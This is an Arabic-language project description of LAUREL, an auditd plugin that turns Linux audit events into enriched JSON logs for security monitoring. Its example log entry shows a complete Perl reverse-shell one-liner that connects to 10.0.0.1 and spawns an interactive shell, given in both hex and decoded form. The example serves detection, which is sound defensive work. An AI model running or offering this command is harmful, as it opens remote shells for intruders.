
تحويل سجلات مراجعة Linux لاستخدام SIEM
LAUREL هو مكون إضافي لمعالجة الأحداث بعد وقوعها لـ auditd(8) يقوم بتوليد سجلات تدقيق غنية ومفيدة بتنسيق JSON مناسبة لإعدادات مراقبة الأمان الحديثة.
يمكن العثور على الوثائق المقابلة لأحدث إصدار مستقر هنا.
باختصار: بدلاً من أحداث التدقيق التي تبدو هكذا…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
……يقوم LAUREL بتحويلها إلى سجلات JSON حيث تصبح الفوضى التي يحاول المهاجمون/مختبرو الاختراق/فريق الأحمر إحداثها واضحة للوهلة الأولى:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
يحدث هذا في المصدر لأن LAUREL يعمل على المضيف حيث يتم توليد أحداث التدقيق. يتم إثراء الأحداث بمعلومات مفيدة حول العملية الأم (ppid):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
تم وصف تفاصيل التكوين والتشغيل في صفحة الدليل laurel(8). يمكن العثور على تفاصيل حول تنسيق السجل والمبررات في صفحة الدليل laurel-about(7). تحتوي صفحة laurel-audit-rules(7) على نصائح وأمثلة لتكوين قواعد التدقيق المفيدة لكشف تكتيكات المهاجمين.
تحتوي تعليمات تثبيت LAUREL على إرشادات حول كيفية بناء LAUREL من المصدر وكيفية تثبيته وتكوينه.
طورنا LAUREL لأننا لم نكن راضين عن مجموعات الميزات وخصائص الأداء للمشاريع والمنتجات الحالية. يُرجى الرجوع إلى مستند الأداء للحصول على التفاصيل.
رخصة جنو العمومية العامة، الإصدار 3
تم إنشاء الشعار بواسطة Birgit Meyer <[email protected]>.